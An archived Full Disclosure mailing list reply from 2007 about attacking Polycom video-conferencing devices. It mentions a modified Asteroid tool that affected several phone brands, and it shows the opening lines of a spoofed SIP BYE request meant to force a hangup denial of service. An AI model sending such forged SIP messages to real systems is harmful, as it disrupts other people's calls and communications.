Full Disclosure mailing list archives

Re: Polycom hacking

From: Paul Schmehl <pauls () utdallas edu>
Date: Tue, 26 Jun 2007 13:37:02 -0500

--On Tuesday, June 26, 2007 14:15:51 -0400 "J. Oquendo" <sil () infiltrated net> wrote:

Paul Schmehl wrote:
Is anyone aware of any work done in the field of hacking Polycom
video-conferencing devices?  Or any known hacks for Polycom devices?

Hey Paul,

I have a modified version of Asteroid lying on one of my
servers that affected Polycoms, Snoms, Hitachi WiFi's,
and possibly a few others.

Offhand you could with high probability generate a hangup
DoS if you know enough about the network topology. E.g.:

   BYE sip:victim.phone.com SIP/2.0
   Via: SIP/2.0/TCP spoofed.pbx.server.com:5060
   Max-Forwards: 70